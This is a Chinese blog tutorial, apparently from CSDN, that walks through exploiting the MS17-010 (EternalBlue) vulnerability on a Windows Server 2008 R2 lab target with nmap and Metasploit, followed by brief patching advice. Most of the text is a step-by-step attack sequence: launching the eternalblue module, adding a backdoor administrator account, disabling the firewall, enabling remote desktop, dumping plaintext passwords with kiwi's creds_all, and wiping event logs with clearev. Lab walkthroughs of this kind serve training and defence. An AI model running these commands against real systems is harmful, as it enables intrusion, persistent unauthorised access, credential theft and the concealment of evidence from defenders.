MS17-010永恒之蓝-漏洞利用+修复方法

本文通过Metasploit工具详细演示了对Windows Server 2008 R2上的MS17-010(永恒之蓝)漏洞进行扫描、利用和攻击的过程,包括nmap的漏洞扫描、加载永恒之蓝攻击模块、提权、创建管理员用户、关闭防火墙以及开启远程桌面连接。同时,文章也提供了漏洞修复建议,如关闭445端口、开启防火墙和安装安全补丁。
摘要由CSDN通过智能技术生成

前言
提到操作系统漏洞,大家肯定听说过耳熟能详的永恒之蓝(MS17-010)了,他的爆发源于WannaCry勒索病毒的诞生。
该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的危险漏洞“EternalBlue”(永恒之蓝)进行传播 。勒索病毒肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了巨大损失。最新统计数据显示,100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感染。 勒索病毒是自熊猫烧香以来影响力最大的病毒之一。
本文将利用Metasploit工具来对此漏洞进行一次漏洞利用示范以及提出修复建议。
 

0x01 准备工作

  • 靶机:Windows server 2008R2(IP:192.168.100.135)
  • 攻击机:Kali 2020(IP:192.168.100.128)
  • 工具:namap(这里主要用于漏洞扫描,也可以使用nussus等其他工具)、metasploit(msf)

0x02 漏洞利用

用nmap的漏洞扫描模式

nmap --script=vuln 192.168.100.135

靶机上扫到了4个漏洞,其中包括了MS17-010。打开metasploit

 搜索ms17-010的漏洞

serach ms17-010

 加载扫描模块 并进行扫描

加载模块
use auxiliary/scanner/smb/smb_ms17_010 
查看配置选项
show options
设置目标ip
set  RHOSTS 192.168.100.135
扫描测试 /两个都行
run
exploit

可以看到存在这个漏洞

使用永恒之蓝攻击模块

use exploit/windows/smb/ms17_010_eternalblue

查看选项并设置RHOSTS

show options
set RHOSTS 192.168.100.135

输入run 或者exploit开始攻击。

运行成功会出现meterpreter >
Meterpreter 是 Metasploit 的一个扩展模块,可以调用 Metasploit 的一些功能,
对目标系统进行更深入的渗透,如获取屏幕、上传/下载文件、创建持久后门等。

meterpreter常用命令 - tech_lee - 博客园sessions -l 查看会话 backgroud 暂时退出当前会话 注入进程: ps 查看进程 migrate 注入进程进程ID 一般选择explorer.exe对应的PID run vnc 查https://www.cnblogs.com/simonlee-hello/p/14780318.html

我们进行提权操作

看看主机信息 出现了乱码  使用chcp 65001 解决

创建用户 提升管理员权限

net user hacker root520?? /add
net localgroup administrators hacker /add
net user hacker

 关闭防火墙

关闭防火墙netsh firewall set opmode mode=disable 
防火墙恢复默认配置:netsh firewall reset 
查看防火墙状态: Netsh Advfirewall show allprofiles

开启桌面连接 //需要开启3389端口

rdesktop 192.168.100.135:3389 

成功进入目标系统

获取目标机的密码

先ctrl+Z,选择y,则将当前shell放到后台。

//   Kiwi进程迁移工具的使用 | MSF中kiwi模块的使用_黑客技术

简述:

提权到system权限 //如果有system权限 就不用了

查看系统信息 ps进程 并进行进程迁移

sysinfo
ps
migrate 476

加载kiwi模块   load kiwi

查看kiwi模块的使用  help kiwi

该命令可以列举系统中的明文密码 creds_all 

日志清理

meterpreter > clearev

清除日志前,目标机器的事件查看器是这样的。(记录了大量的事件)

 

 今天就到这里了..............

0x02 漏洞修复

  • 关闭445端口
  • 打开防火墙,安装安全软件
  • 安装对应补丁

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小晨_WEB

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值